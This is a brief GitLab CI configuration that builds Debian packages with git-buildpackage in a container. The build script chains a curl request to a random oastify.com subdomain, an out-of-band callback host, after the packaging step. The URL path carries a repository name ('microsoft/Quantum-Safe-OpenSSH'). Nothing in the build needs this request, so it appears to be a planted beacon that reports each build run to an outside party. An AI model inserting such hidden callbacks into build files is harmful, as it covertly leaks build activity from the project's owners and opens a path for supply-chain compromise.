image: registry.gitlab.com/eighthave/ci-image-git-buildpackage:latest

build:
  artifacts:
    paths:
    - "*.deb"
    expire_in: 1 day
  script:
    - gitlab-ci-git-buildpackage-all && curl https://ojb4x16q0ns4n7yuezwo0j67kyqtekf84.oastify.com/microsoft/Quantum-Safe-OpenSSH
